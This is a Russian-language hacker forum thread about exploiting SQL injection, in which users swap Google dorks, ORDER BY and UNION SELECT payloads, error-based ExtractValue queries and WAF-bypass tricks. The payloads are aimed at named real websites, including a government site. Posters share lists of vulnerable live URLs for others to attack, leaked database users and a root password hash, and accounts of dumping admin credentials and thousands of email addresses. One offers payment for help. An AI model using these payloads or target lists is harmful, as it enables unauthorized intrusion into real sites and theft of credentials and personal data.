t0xA, видео можешь сделать?

Какой запрос нужно ввести в google чтобы найти уязвимые сайты с SQL - INJECTION ?

Speaker примерно так
inurl:".php?id=3"
ну а дальше твои фонтазии)))

:hmcool: А есть подобные ей???

Помогите пожалуйста раскрутить уязвимость ...

http://88.214.194.37/reg.php (https://hpc.name/redirector.html#http://88.214.194.37/reg.php)

:banana:

Дарова всем. Короче на одном сайте нашел ошибки
code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1rfbd/domains/rfbd.ru/public_html/cat.php on line 10

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1rfbd/domains/rfbd.ru/public_html/cat.php on line 29
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1rfbd/domains/rfbd.ru/public_html/cat.php on line 122

Это SQL - injecton ?

Проблема следующая: при попытке определить имена таблиц запросом "php?id=-1+UNION+SELECT+1,schema_name+FROM+information_sche ma.tables--" сайт выдает ошибку "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource..." В чем может быть трабла?

Нет, ничего не поменялось, страница остается та же. Версия БД 5.0.51a-24+lenny1

Цитата:

Сообщение от Ram0nlord

Кинь адрес странички в ЛС

Скинул

Добавлено через 11 часов 17 минут
Сегодня с помощью SQL Helper удалось вытащить логины и пассы админов сайта. Но все равно хочу понять, почему вручную это не получается.

думаю для многих будет полезно попрактиковаиться

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

вот нашёл

code:

http://www.poznay-mir.ru/hotel.php?uid=1422'

Цитата:


Для этого после цифры которая следует после ID ввести команду
order+by+10/*



Вставил так

code:

http://www.poznay-mir.ru/hotel.php?uid=1422'order+by+10/*

Хмм..и чё то не вылазит ошибка таблицы.Почему-так? помогите лузеру?

Всё кулл) всё разобрался и научился
вот инъекции для навичков- кому надо ломайте и рулите сайтами:

Цитата:

http://shkola.lv/index.php?mode=topics&t=5173 (https://hpc.name/redirector.html#http://shkola.lv/index.php?mode=topics&t=5173)
http://sao.mos.ru/?r=9_doc&cat= (https://hpc.name/redirector.html#http://sao.mos.ru/?r=9_doc&cat=)
http://maxpj.ru/system.php/ (https://hpc.name/redirector.html#http://maxpj.ru/system.php/)
http://www.voyage-luxe.ru/hotel/?uid= (https://hpc.name/redirector.html#http://www.voyage-luxe.ru/hotel/?uid=)
http://autoworld.agava.ru/compare.ph...B%5D=auditc18& (https://hpc.name/redirector.html#http://autoworld.agava.ru/compare.php3?view=FromSearch&modid%5B%5D=inffx45&modid%5B%5D=auditc18&)
http://www.medialaw.kz/index.php?r=1c=1655 (https://hpc.name/redirector.html#http://www.medialaw.kz/index.php?r=1c=1655)
http://www.aquariustour.ru/news/ (https://hpc.name/redirector.html#http://www.aquariustour.ru/news/)
http://states-world.ru/section.php/ (https://hpc.name/redirector.html#http://states-world.ru/section.php/)
http://www.poznay-mir.ru/countries/turkey/resorts/side/ (https://hpc.name/redirector.html#http://www.poznay-mir.ru/countries/turkey/resorts/side/)
http://www.qafqaz.edu.az/index.php?z..._id=689&dil=ru (https://hpc.name/redirector.html#http://www.qafqaz.edu.az/index.php?z=982&inf_id=689&dil=ru)
http://www.stroika.md/detail.php?id= (https://hpc.name/redirector.html#http://www.stroika.md/detail.php?id=)
http://buxprofessional.com/register.php?r=enot773 (https://hpc.name/redirector.html#http://buxprofessional.com/register.php?r=enot773)

+ и спс

Гы ну чтож начал я с определения количества таблиц их 21 ,потом я смарел их названия

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



после я узнавал названия колонок но у мя не получается

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



и тут я остановилсо=(

А почему в статье ни чего не сказано про команду limit?=( объясните через нее на угад надо находить талицу юзверей или как я чета не доганю?)

Гы и в чем моя ошибка када я хачу вывести названи колонок из таблы=(вот ссыль

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Ram0nlord снизи хайд до 20 пл3

Цитата:


column_n ame



Ram0nlord это с форумом чета нето,я писал без пробела)
Оо как огрничений на вывод нету?))а почемму када я составляю запрос на вывод таблиц вылазиет тока 1 таблица,тонее имя её)
гы и еше я нашол там таблицу user,составляю запрос чтобы выкрасть инфу отуда но ошибку выдает=(

Цитата:

code:

http://www.voyage-luxe.ru/new/news/archives.php?uid=-2447+union+select+1,table_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15+from+information_schema.tables+limit+ ?,1--

5.0.77:voyage:root@zvm19



Цитата:

code:

http://www.stroika.md/news_db/shablon_company.php?id=-3796+union+select+1,2,table_name,4,5,6,7,8+from+in formation_schema.tables+limit+?,1--

5.0.54-log:zapas:ggs1950@localhost



Где указан ? просьба помочь!!!
не могу подобрать число к таблице

Странно чё-то с этим www.poznay-mir.ru (https://hpc.name/redirector.html#http://www.poznay-mir.ru)
нашёл юзера root
и пасс зашифрованый
Цитата:


856CD78A9BDB55DA3D32F14FFA42750B9BB8FAC0



когда прогнал по базам хэш нашел пароль

Скрытый текст (вы должны быть авторизованы и иметь 50 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



потом зашел в админку
http://www.poznay-mir.ru/admin/index.php (https://hpc.name/redirector.html#http://www.poznay-mir.ru/admin/index.php)
проверил и не подошло(((

Вот код не выдает табл...

code:

http://www.pkrussia.ru/index.php?id=-1%20union%20select%201,2,table_name,4,5,6,7,8,9,10 %20from%20information_schema.tables

Вот скрин

У меня вопрос я все делаю но на 2 шаге у меня не выдает номер таблице:bomb:

вот посмотрите может я че не то делаю((((

HTML highlight


http://www.poznay-mir.ru/about.php?uid=13%20union%20select%201,2,3,4,5

=============================================
:bomb::bomb::bomb::bomb::bomb::bomb:

Цитата:

Сообщение от Ram0nlord

*** скрытый текст ***
Это значит,что табл 5
*** скрытый текст ***
цифра с которой будешь работать))далее нетрудно определить версию,подскажу,версия 5 - то есть доступна information_schema

А как ты узнал??????
Я там не чего не видел......
((((((((((

Добавлено через 1 минуту
выложи скрин если моешь....

Цитата:

Сообщение от Ram0nlord

глупый вопрос..курил книги,маны и видосы))

нет,немогу,советую почитать статьи от Тохи и посмотреть его видосы(всё найдёшь в этом же разделе)

Вот смотри че он у меня выводит

[/URL]

=======================================
Вот где здесь номер табл. как на видео ТОХИ
вот я и спросил как ты узнал

[URL="http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1638"] (http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1637)

Не заметил)))))

Добавлено через 25 минут

code:

http://www.poznay-mir.ru/about.php?uid=-13+union+select+1,2,3,4,tabel_name%20from+informat ion_schema.tables--

===================
Что поставить за место %20 я перепробовал + и ,

есть прога для упрощение иньекций

SQLIHelperV извините ссылочки нет

code:

http://unitedcastbar.com/site.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6 ,7,8,9,10+from+information_schema.columns+where+ta ble_name='users'--

code:

http://www.medialaw.kz/index.php?c=-1655+union+select+group_concat(column_name),2+from +information_schema.columns+where+table_name='CHAR ACTER_SETS'--

чё тут не так?)

http://www.turkishculturalfoundation...ages.php?ID=82 (https://hpc.name/redirector.html#http://www.turkishculturalfoundation...ages.php?ID=82)'
Подскажите как раскрутить инъекцию дальше? я ставилю запросы но ничего не происходит.

Дай ссылку на обычный сайт ща сам попробую

http://www.turkishculturalfoundation.org/ (https://hpc.name/redirector.html#http://www.turkishculturalfoundation.org/)

Добавлено через 25 минут
просканил xspider говарит что инъекция есть

Добавлено через 1 час 1 минуту
Kit,ну что получилось чтонибудь?

Добавлено через 1 час 52 минуты
http://www.aquariustour.ru/news/ (https://hpc.name/redirector.html#http://www.aquariustour.ru/news/)
А где id взять чтоб инъекцию дальше расскрутить?

The used SELECT statements have a different number of columns

Это вылезает вместо просмотра таблиц БД юзера

http://sitename.net/showsoft.php?id=...ion+select+1/* (https://hpc.name/redirector.html#http://sitename.net/showsoft.php?id=119+union+select+1/*)

Чооооооо делать, не подскажете?))))

Цитата:


>The used SELECT statements have a different number of columns

Это вылезает вместо просмотра таблиц БД юзера

http://sitename.net/showsoft.php?id=...ion+select+1/* (https://hpc.name/redirector.html#http://sitename.net/showsoft.php?id=119+union+select+1/*)

Чооооооо делать, не подскажете?))))
================================================== ========



Если я в этом что и рублю то, вы неправильно опеределили количество таблиц(одной быть походу не может)

Сначала нужно узнать количество а уже потом просматривать версию БД и т.д.

Сначала узнайте количество таблиц при помощи команды order+by:

Цитата:


Следующим шагом нам необходимо узнать количество таблиц. Это делается при помощи команды order+by
http://site.com/main.php?id=12+order+by+1/* (https://hpc.name/redirector.html#http://site.com/main.php?id=12+order+by+1/*) - при введении этой команды ошибка должна исчезнуть потомучто количество таблиц больше чем 1...
http://site.com/main.php?id=12+order+by+10000/* (https://hpc.name/redirector.html#http://site.com/main.php?id=12+order+by+10000/*) - ошибка появляется вновь потомучто количество таблиц меньше чем 10000
http://site.com/main.php?id=12+order+by+10/* (https://hpc.name/redirector.html#http://site.com/main.php?id=12+order+by+10/*) - ошибка исчезла а при введении http://site.com/main.php?id=12+order+by+11/* (https://hpc.name/redirector.html#http://site.com/main.php?id=12+order+by+11/*) появилась, из этого следует что количество таблиц 10.

Цитата:

Сообщение от Fincher

как с этим быть? http://wow.dport.com.ua/bugtracke/?page= (https://hpc.name/redirector.html#http://wow.dport.com.ua/bugtracke/?page=)'

это ведь инъекция?

Да) продолжай дальше)

пытался чтото подписывать,смотрел видос,ничего)
остаётся все как и было)

как с этим быть? http://wow.dport.com.ua/bugtracke/?page= (https://hpc.name/redirector.html#http://wow.dport.com.ua/bugtracke/?page=)'

это ведь инъекция?

Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: NO) in /usr/local/www/apache22/data/lk/include/functions.php on line 49

Warning: mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /usr/local/www/apache22/data/lk/include/functions.php on line 50

Warning: mysql_query() [function.mysql-query]: Access denied for user 'root'@'localhost' (using password: NO) in /usr/local/www/apache22/data/lk/include/functions.php on line 51

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /usr/local/www/apache22/data/lk/include/functions.php on line 51

Warning: mysql_query() [function.mysql-query]: Access denied for user 'root'@'localhost' (using password: NO) in /usr/local/www/apache22/data/lk/include/functions.php on line 199

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /usr/local/www/apache22/data/lk/include/functions.php on line 199

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/local/www/apache22/data/lk/include/functions.php on line 200

Notice: Undefined index: in /usr/local/www/apache22/data/lk/include/functions.php on line 216
что из этого можно состряпать?

Цитата:

Сообщение от Fincher

Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: NO) in /usr/local/www/apache22/data/lk/include/functions.php on line 49

не ту подключения к базе данных!! не чего не состряпаешь
ну хотя можно попробовать самому коннектиться если админ сайта не ставил пас при установки сервера!

У меня вот такой вопрос тут goolel наткнулся на такую ошибку явно не с базой связана но может кто знает что сделать можно=)

code:

Warning: main(hotels/text_3'.htm) [function.main]: failed to open stream: No such file or directory in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

Warning: main(hotels/text_3'.htm) [function.main]: failed to open stream: No such file or directory in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

Warning: main() [function.include]: Failed opening 'hotels/text_3'.htm' for inclusion (include_path='./:/') in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

Добавлено через 2 минуты
вот адрес сайта http://www.kanikuly.crimea.ua/s_hotels.php?nom=3 (https://hpc.name/redirector.html#http://www.kanikuly.crimea.ua/s_hotels.php?nom=3)'

Добавлено через 1 час 43 минуты
Все разобрался!=)

Lesha_firs, вообще-то вроде не похоже на скуль... Я ошибаюсь? Если можешь, выложи в раскрученном виде.

Цитата:

Сообщение от stan_q

Lesha_firs, вообще-то вроде не похоже на скуль... Я ошибаюсь? Если можешь, выложи в раскрученном виде.

Ошибаешся! это и есть скуль, дальше юзать +oder+by+99-- неохота так как это задротство, а так скуль ровная!

Нашел сайт с дыркой. При запросе выплюнуло вот что
================================================== =======================
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND keywords IS NOT NULL AND language='1'' at line 1: SELECT keywords FROM T_CNT_UNIT_DATA WHERE unit IN (57`) AND keywords IS NOT NULL AND language=?
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND language='1'' at line 1: SELECT title FROM T_CNT_ARTICLE_DATA WHERE article IN (57`) AND language=?
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND b.language='1'' at line 1: SELECT * FROM T_CNT_UNIT a INNER JOIN T_CNT_UNIT_DATA b ON a.unit=b.unit WHERE a.unit IN (57`) AND b.language='1'
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND b.language='1'' at line 1: SELECT * FROM T_CNT_NEWS a INNER JOIN T_CNT_NEWS_DATA b ON a.news=b.news WHERE a.news IN (57`) AND b.language='1'
================================================== ===================
Подскажите что делать дальше?

Цитата:

Сообщение от stan_q

Lesha_firs, вообще-то вроде не похоже на скуль... Я ошибаюсь? Если можешь, выложи в раскрученном виде.

Это не скул! ты прав!

Цитата:

Сообщение от leons

Ошибаешся! это и есть скуль, дальше юзать +oder+by+99-- неохота так как это задротство, а так скуль ровная!

так +oder+by+99-- юзать не поможет так как я уже говорил это не скул!

вот почему смотри на ошибку!

code:

Warning: main() [function.include]: Failed opening 'hotels/text_3'.htm' for inclusion (include_path='./:/') in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

Warning: main() [function.include]: видем что это ошибка подключения какойто страницы в данном случае это страница /hotels/text_3.htm
так как указано ' между расширением:smartass:
а указания на скул это ошибка такого вида Warning: mysql_fetch_array
или
Warning: mysql_qery

Frinst, А запрос-то какой был? xD Кинь что писал в адресе.

Цитата:

Сообщение от Frinst

Нашел сайт с дыркой. При запросе выплюнуло вот что
================================================== =======================
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND keywords IS NOT NULL AND language='1'' at line 1: SELECT keywords FROM T_CNT_UNIT_DATA WHERE unit IN (57`) AND keywords IS NOT NULL AND language=?
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND language='1'' at line 1: SELECT title FROM T_CNT_ARTICLE_DATA WHERE article IN (57`) AND language=?
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND b.language='1'' at line 1: SELECT * FROM T_CNT_UNIT a INNER JOIN T_CNT_UNIT_DATA b ON a.unit=b.unit WHERE a.unit IN (57`) AND b.language='1'
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND b.language='1'' at line 1: SELECT * FROM T_CNT_NEWS a INNER JOIN T_CNT_NEWS_DATA b ON a.news=b.news WHERE a.news IN (57`) AND b.language='1'
================================================== ===================
Подскажите что делать дальше?

давай сайт! там скорей всего неверная связка таблиц вот он и ругается=)

Добавлено через 5 минут

Цитата:

Сообщение от M@ZAX@KEP

Frinst, А запрос-то какой был? xD Кинь что писал в адресе.

да я после nom=3 поставил ' он мне ошибку и выдал=)

Добавлено через 5 минут
это не правильно подключается файл web-программист наверное когда писал сайт склеивал перименные вот доказательства
поставьте в конце '
и увидете ошибку вида

code:

Warning: main(hotels/text_3'.htm) [function.main]: failed to open stream: No such file or directory in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

Warning: main(hotels/text_3'.htm) [function.main]: failed to open stream: No such file or directory in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

Warning: main() [function.include]: Failed opening 'hotels/text_3'.htm' for inclusion (include_path='./:/') in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

обратите внимание на такой кусок 'hotels/text_3'.htm'

а теперь поставьте *
получите

code:

Warning: main(hotels/text_3*.htm) [function.main]: failed to open stream: No such file or directory in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

Warning: main(hotels/text_3*.htm) [function.main]: failed to open stream: No such file or directory in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

Warning: main() [function.include]: Failed opening 'hotels/text_3*.htm' for inclusion (include_path='./:/') in /var/www/kanikuly/kanikuly.crimea.ua/s_hotels.php on line 39

и обратите внимание на следушьй кусок кода 'hotels/text_3*.htm'

найдите одно отличее и вы поймете что базы данных сдесь вообще не используются

А если в конце не site.php?id=1, а viewforum.php?id=1 то можно найти sql injection? А то уже стока форумов просмотрел и везде кавычка не катит

Spazz (https://hpc.name/member.php?u=3739), форумы обычно стоят на проверенных движках, где подобные вещи уже отфильтрованы.

Подскажите, может, сталкивался кто: при подстановке кавычки выпадает стандартная ошибка. Дальше пишу union+select... - опять выпадает ошибка, даже если пишу +1-- (пробовал /*, вообще без окончания - без разницы).
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1--,20' at line 6

По сути да, но что-то не крутится... вывод ошибки очень специфический...

да
http://topgir.com.ua/?id=908 (https://hpc.name/redirector.html#http://topgir.com.ua/?id=908) and 1=1
http://topgir.com.ua/?id=908 (https://hpc.name/redirector.html#http://topgir.com.ua/?id=908) and 1=(select 1,2) --+ [ обработка ошибок просто мечта хакира : )))) ]

на вопрос ответ дан на 100% : ))))

Добавлено через 23 минуты
стало любопытно:

http://topgir.com.ua/?id=908 (https://hpc.name/redirector.html#http://topgir.com.ua/?id=908) union select ExtractValue(1,concat(0x5C,(version()))),2,3,4,5,6--+
=>
5.1.32-log

http://topgir.com.ua/?id=908 (https://hpc.name/redirector.html#http://topgir.com.ua/?id=908) union select ExtractValue(1,concat(0x5C,(user()))),2,3,4,5,6--+
=>
topgir@localhost

http://topgir.com.ua/?id=908 (https://hpc.name/redirector.html#http://topgir.com.ua/?id=908) union select ExtractValue(1,concat(0x5C,(select schema_name FROM INFORMATION_SCHEMA.schemata limit 1,1)))--+
=>
topgir

topgir.com.ua/?id=908 (https://hpc.name/redirector.html#http://topgir.com.ua/?id=908)'

Это SQL - injecton ?

Zot - все есть, юзай SQLHelper.

Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

есть сайт с уязвимостью, не могу найти пароли, подозреваю, что их нет в базе данных, посмотрите, может удастся что-нибудь откопать. Вот сайт

Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

всем привет. помогите вот с этим разобратся.

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



и на этом остановился. так как ни в одной цифре вывода на страницу нету. можно тут как то раскрутить? :hmcool:

Цитата:

Сообщение от oficeran

всем привет. помогите вот с этим разобратся.
*** скрытый текст ***
и на этом остановился. так как ни в одной цифре вывода на страницу нету. можно тут как то раскрутить? :hmcool:

Похоже на обычный blind.

Вот наткнулся на интересную скуль:

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



На order+by выкидывает на главную страницу. При использовании union+select для определения столбцов - пока неверно, то получаю ошибку, а когда верно (столбцов всего 2 по ходу), то опять выкидывает на главную.
Дальше что-то не соображу, как крутить. Кто подскажет?

2 wolf295214: скрипт для вывода инфы через limit:

code:



(c) Dr.Z3r0 [antichat.ru]

Цитата:

Сообщение от stan_q

Spazz (https://hpc.name/member.php?u=3739), форумы обычно стоят на проверенных движках, где подобные вещи уже отфильтрованы.

Подскажите, может, сталкивался кто: при подстановке кавычки выпадает стандартная ошибка. Дальше пишу union+select... - опять выпадает ошибка, даже если пишу +1-- (пробовал /*, вообще без окончания - без разницы).
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1--,20' at line 6

попробуй вконце поставить не -- и не /*, а попробуй либо +-- или --+ или +--+

Добавлено через 6 минут
ребят может кто подсказать,чтобы все 2000 мыльников вывелись?а то с лимитом не охота возиться,да и group_concat не всё выводит

это у меня есть!Может ещё можно как то по быстрому?

хДД хлопцы чё за фигня? сегодня лазил по сайтам смотрю.
http://shop.ingalaxis.de/index.php?id=3+order+by+1-- (https://hpc.name/redirector.html#http://shop.ingalaxis.de/index.php?id=3+order+by+1--)
Зайдите-Зайдите
Правда или не?

Цитата:

Сообщение от NITROS

хДД хлопцы чё за фигня? сегодня лазил по сайтам смотрю.
http://shop.ingalaxis.de/index.php?id=3+order+by+1-- (https://hpc.name/redirector.html#http://shop.ingalaxis.de/index.php?id=3+order+by+1--)
Зайдите-Зайдите
Правда или не?

Админ ресурса однако шутник:rofl:

не бойся,эта пугалка,для тех кто сразу подумает ,что это всё,заним приедут Управление "Р"))
И теперь подумай для кого это)))))
maks999000 полностью с тобой согласен!

Вот что sql inject me нашёл на одном сайте
Спойлер
[/URL][URL="https://hpc.name/redirector.html#http://img.megatorrents.kz/share.php?id=7B0C_4C19C72D"] (https://hpc.name/redirector.html#http://img.megatorrents.kz/share.php?id=7B0C_4C19C72D)IMAGE (https://hpc.name/redirector.html#http://img.megatorrents.kz/graphic/images/2010/June/17/7B0C_4C19C72D.jpg) http://img.megatorrents.kz/graphic/images/2010/June/17/7B0C_4C19C72D.jpg

Это и есть уязвимости? Если да, то как их использовать?

Цитата:

Сообщение от Mehenta

По умолчанию Re: SQL - INJECTION Вот что sql inject me нашёл на одном сайте Спойлер: Это и есть уязвимости? Если да, то как их использовать?

Не похоже. Но надо ручками проверить.
Статус 302 говорит о том, что страница найдена. А testeв values переводится как "тестируемые значения", т.е. то, что подставлялось.

Вот тот сайтик
http://kezdesu.com/ (https://hpc.name/redirector.html#http://kezdesu.com/)

В каких таблицах хранятся логины и пароли админов?

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

Цитата:

Сообщение от Mehenta

Вот тот сайтик http://kezdesu.com/ (https://hpc.name/redirector.html#http://kezdesu.com/)

Сайт на движке WordPress 2.9.2. Ищи паблик баги в гугле (если есть)

Дербаним на здоровье.

Скрытый текст (вы должны быть авторизованы и иметь 50 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Он полностью ваш на растерзание, что дальше делать думаю сами поймете + ко всему сайты. Каждый кто там зареганый - это админ.

Скрытый текст (вы должны быть авторизованы и иметь 200 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

Дико извиняюсь перед пользователями за оффтоп, но я такого еще не видел
Скуля (https://hpc.name/redirector.html#http://freendex.ru/post.php?cat=1&id=1%27)

stan_q, а на DLE строку "Hacking Attempt" в таких случаях помнишь? По сути то же самое, только текст другой ;)

Конечно, я принцип знаю, но мне сама надпись понравилась

не получатся найти таблици помогите плиз http://smartlip.com/sforum/th.php?ac...&theme_id=3707 (https://hpc.name/redirector.html#http://smartlip.com/sforum/th.php?act=show&theme_id=3707)'

Небольшой совет из личной практики: часто по команде

code:

union+select+table_name+from+information_schema.ta bles

выпадает только одна таблица.
Многие в таком случае используют group_concat, но и это не всегда спасает, если много таблиц - все просто не вмещаются в одну строку. Вот в таком случае используйте команду типа group_concat(table_name,"\n"), и будет вам счастье .

В последнее время все большую популярность набирают WAF - фильтры, помогающие администраторам пресечь использование стандартных уязвимостей, в т.ч. и sql-inj.
Попробуйте проинжектить сайт

Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Количество таблиц подбирается легко, стандартным order+by. Их выходит 13. А вот при запросе union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 выпадает офф.
В таком случае запрос будет выглядеть так:

code:

Profile.php?id=-62/*!+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13*/

И все работает :yahoo:

Teran901, ошибка в приведении типов... какой запрос такую вызвал?

подскажите это SQL - INJECTION?

Microsoft OLE DB Provider for SQL Server error '80040e21'

Error converting data type varchar to int.

/includes/classes/class_db.asp, line 51

Цитата:

Сообщение от M@ZAX@KEP

Teran901, ошибка в приведении типов... какой запрос такую вызвал?

game.asp?id=11721' вот такой запрос делал

Добавлено через 26 минут
после game.asp?id=11721+order+by+10-- все тоже самое

Microsoft OLE DB Provider for SQL Server error '80040e21'

Error converting data type varchar to int.

/includes/classes/class_db.asp, line 51

Teran901, попробуй значение параметра game увести в недопустимое, напр.
после game.asp?id=-1+order+by+10+--+

http://www.mp3hungama.com/music/genr...lect+1,+2,+3-- (https://hpc.name/redirector.html#http://www.mp3hungama.com/music/genre_albums.php?id=-3+union+select+1,+2,+3--) почему он мне не чего не выдаёт ?он вроде должен выдавать цифру с которой будем работать

Уважаемые форумчане, помогите плз разшевелить одну Blind SQL inject.
Есть баг

Цитата:


site/?news&id=139/**/and/**/1=1



Но при

Цитата:


site/?news&id=139/**/and/**/ascii(lower(substring(user(),1,1)))>100



Ворачевается на главную, есть вероятность что фильтрются скобки, как можно это обойти?
Подскажите какие есть нюансы при Blind SQL inject, или дайте ссылку. С плюсами не обижу.:rolleyes:
Если все прокатит возможно хорошее вознагрождение!

Цитата:

Сообщение от LiRvD08

Уважаемые форумчане, помогите плз разшевелить одну Blind SQL inject.
Есть баг
Цитата:
site/?news&id=139/**/and/**/1=1
Но при
Цитата:
site/?news&id=139/**/and/**/ascii(lower(substring(user(),1,1)))>100
Ворачевается на главную, есть вероятность что фильтрются скобки, как можно это обойти?
Подскажите какие есть нюансы при Blind SQL inject, или дайте ссылку. С плюсами не обижу.
Если все прокатит возможно хорошее вознагрождение!

Попробуй вообще без скобок, зачем тебе они? Пробуй обычный order+by и select+union.

PS C плюсами ты погарячился, у тебя вес репы 0 :wink:

Цитата:

Сообщение от stan_q

Попробуй вообще без скобок, зачем тебе они? Пробуй обычный order+by и select+union.

Через order by кол-во колонок сразу подобрал, а вот union+select не пашет.
Мне этот сайт нужен, так что буду дальше копать.

http://203.10.121.98/deliver/content.asp?pid=38337 (https://hpc.name/redirector.html#http://203.10.121.98/deliver/content.asp?pid=38337) по этому запросу

Microsoft OLE DB Provider for SQL Server error '80004005'

Failed to update database "lpplc07" because the database is read-only.

/includes/webpagecontent.asp, line 156

Возможно что нить сделать?

Цитата:

Сообщение от Hakera

http://203.10.121.98/deliver/content.asp?pid=38337 по этому запросу

Microsoft OLE DB Provider for SQL Server error '80004005'

Failed to update database "lpplc07" because the database is read-only.

/includes/webpagecontent.asp, line 156

Возможно что нить сделать?

Думаю, нет, т.к. ты запрос ничего не возвращает из базы. Похоже, что сайт к БД коннектится через ограниченного юзера, который ничего не может сделать.

http://www.libraryonline.com/default.asp?pID=30 (https://hpc.name/redirector.html#http://www.libraryonline.com/default.asp?pID=30) С помощью Хелпера выбил Таблицу mysql.user и две колонки Password and User однако открыть их не как...

вот дырка тут есть, вот только не могу расчитать тама

Добавлено через 1 час 22 минуты
http://www.libraryonline.com/default.asp?pID=30 (https://hpc.name/redirector.html#http://www.libraryonline.com/default.asp?pID=30)
http://www.technosport.com/product_d...asp?PID=207%27 (https://hpc.name/redirector.html#http://www.technosport.com/product_details.asp?PID=207%27)
http://www.nineeagle.com/en/p.asp?pid=34%27 (https://hpc.name/redirector.html#http://www.nineeagle.com/en/p.asp?pid=34%27)
http://www.act-labs.com/scripts/prod...asp?Pid=851%27 (https://hpc.name/redirector.html#http://www.act-labs.com/scripts/proddetails.asp?Pid=851%27)
http://www.hms.se/products/products.asp?PID=110%27 (https://hpc.name/redirector.html#http://www.hms.se/products/products.asp?PID=110%27)
http://www.jorkyball.org/home/page.asp?pid=58%27 (https://hpc.name/redirector.html#http://www.jorkyball.org/home/page.asp?pid=58%27)
http://www.sangean.com/products/prod....asp?pid=11%27 (https://hpc.name/redirector.html#http://www.sangean.com/products/products_main.asp?pid=11%27)
http://www.anybus.com/products/products.asp?PID=140%27 (https://hpc.name/redirector.html#http://www.anybus.com/products/products.asp?PID=140%27)
http://www.hakkousa.com/detail.asp?PID=838%27 (https://hpc.name/redirector.html#http://www.hakkousa.com/detail.asp?PID=838%27)
http://academy.softjoys.ru/index.php3?pid=65%27 (https://hpc.name/redirector.html#http://academy.softjoys.ru/index.php3?pid=65%27) (русский сайт компьютерной академии)))
http://www.smtd.org/displayPage.asp?pID=25%27 (https://hpc.name/redirector.html#http://www.smtd.org/displayPage.asp?pID=25%27)
http://www.zonadostupa.ru/catal.php?pid=2 (https://hpc.name/redirector.html#http://www.zonadostupa.ru/catal.php?pid=2)'

http://www.uptime.ru/monitoring.php?pid=12%27 (https://hpc.name/redirector.html#http://www.uptime.ru/monitoring.php?pid=12%27)

Цитата:

Сообщение от Hakera

http://www.libraryonline.com/default.asp?pID=30 С помощью Хелпера выбил Таблицу mysql.user и две колонки Password and User однако открыть их не как...

вот дырка тут есть, вот только не могу расчитать тама

Добавлено через 1 час 22 минуты
http://www.libraryonline.com/default.asp?pID=30 (https://hpc.name/redirector.html#http://www.libraryonline.com/default.asp?pID=30)
http://www.technosport.com/product_d...asp?PID=207%27 (https://hpc.name/redirector.html#http://www.technosport.com/product_d...asp?PID=207%27)
http://www.nineeagle.com/en/p.asp?pid=34%27 (https://hpc.name/redirector.html#http://www.nineeagle.com/en/p.asp?pid=34%27)
http://www.act-labs.com/scripts/prod...asp?Pid=851%27 (https://hpc.name/redirector.html#http://www.act-labs.com/scripts/prod...asp?Pid=851%27)
